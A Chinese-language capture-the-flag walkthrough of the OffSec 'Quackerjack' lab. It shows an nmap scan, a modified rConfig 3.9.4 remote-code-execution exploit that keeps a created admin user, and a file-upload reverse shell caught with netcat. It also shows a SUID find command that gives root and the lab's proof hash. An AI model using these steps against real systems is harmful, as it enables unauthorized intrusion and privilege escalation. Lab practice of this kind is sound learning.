主要知识点
- 端口转发
具体步骤
执行nmap扫描,开了好多端口,我先试验80和8081,看起来8081比较有趣
Nmap scan report for 192.168.51.57
Host is up (0.0011s latency).
Not shown: 65527 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.2
| ftp-syst:
| STAT:
| FTP server status:
| Connected to ::ffff:192.168.49.51
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| At session startup, client count was 3
| vsFTPd 3.0.2 - secure, fast, stable
|_End of status
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_Can't get directory listing: TIMEOUT
22/tcp open ssh OpenSSH 7.4 (protocol 2.0)
| ssh-hostkey:
| 2048 a2:ec:75:8d:86:9b:a3:0b:d3:b6:2f:64:04:f9:fd:25 (RSA)
| 256 b6:d2:fd:bb:08:9a:35:02:7b:33:e3:72:5d:dc:64:82 (ECDSA)
|_ 256 08:95:d6:60:52:17:3d:03:e4:7d:90:fd:b2:ed:44:86 (ED25519)
80/tcp open http Apache httpd 2.4.6 ((CentOS) OpenSSL/1.0.2k-fips PHP/5.4.16)
|_http-server-header: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/5.4.16
|_http-title: Apache HTTP Server Test Page powered by CentOS
| http-methods:
|_ Potentially risky methods: TRACE
111/tcp open rpcbind 2-4 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2,3,4 111/tcp rpcbind
| 100000 2,3,4 111/udp rpcbind
| 100000 3,4 111/tcp6 rpcbind
|_ 100000 3,4 111/udp6 rpcbind
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: SAMBA)
445/tcp open netbios-ssn Samba smbd 4.10.4 (workgroup: SAMBA)
3306/tcp open mysql MariaDB (unauthorized)
8081/tcp open http Apache httpd 2.4.6 ((CentOS) OpenSSL/1.0.2k-fips PHP/5.4.16)
|_http-server-header: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/5.4.16
|_http-title: 400 Bad Request访问8081端口,发现rConfig 3.9.4正在运行
搜索一下exploit得到了 rConfig 3.9.4 - 'searchField' Unauthenticated Root Remote Code Execution - PHP webapps Exploit 需要修改一下exp,在发送request的时候加入 verify=False参数,否则会报自签名证书错误,不过还是会失败在下面这一步,不过至少创建出了admin用户,把exp最后的删除admin user的代码去掉,保留admin权限
[+] Adding a temporary admin user...
[+] Authenticating as pxaovedjzi...
[+] Logged in successfully, triggering the payload...
[+] Check your listener !
[-] The command was not executed by the target or you forgot to open a listener...
[+] Removing the temporary admin user...
[+] Done.继续搜索信息,得到了https://gist.github.com/farid007/9f6ad063645d5b1550298c8b9ae953ff
看来同样具有admin+file upload漏洞,得到reverse shell
C:\home\kali\Documents\OFFSEC\GoToWork\Quackerjack> nc -nlvp 80
listening on [any] 80 ...
connect to [192.168.45.189] from (UNKNOWN) [192.168.162.57] 47790
Linux quackerjack 3.10.0-1127.10.1.el7.x86_64 #1 SMP Wed Jun 3 14:28:03 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux
11:04:35 up 13 min, 0 users, load average: 0.00, 0.00, 0.00
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=48(apache) gid=48(apache) groups=48(apache)
sh: no job control in this shell
sh-4.2$
sh-4.2$ id
id
uid=48(apache) gid=48(apache) groups=48(apache)继续寻找信息,发现 /usr/bin/find命令有 SUID权限,直接利用,得到root权限
bash-4.2$ find / -type f -perm -4000 2>/dev/null
find / -type f -perm -4000 2>/dev/null
/usr/bin/find
......
......
/usr/libexec/dbus-1/dbus-daemon-launch-helper
bash-4.2$ /usr/bin/find . -exec /bin/sh -p \; -quit
/usr/bin/find . -exec /bin/sh -p \; -quit
sh-4.2# id
id
uid=48(apache) gid=48(apache) euid=0(root) groups=48(apache)
sh-4.2# cat /root/proof.txt
cat /root/proof.txt
307a236503d332668cdf2eb1fd38c2f1